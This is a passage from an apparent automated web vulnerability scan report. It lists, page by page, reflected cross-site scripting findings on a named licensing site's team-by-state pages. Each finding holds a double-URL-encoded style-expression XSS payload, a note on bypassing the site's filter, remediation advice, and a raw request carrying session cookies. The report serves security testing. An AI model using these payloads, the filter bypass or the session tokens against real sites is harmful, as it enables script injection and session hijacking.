GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.207. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Minnesota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.208. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Mississippi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.209. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Missouri
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.210. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Montana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.211. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Montreal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.212. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Nebraska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Nevada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Hampshire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Jersey
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Mexico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-York
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/North-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/North-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Ohio
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Oklahoma
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
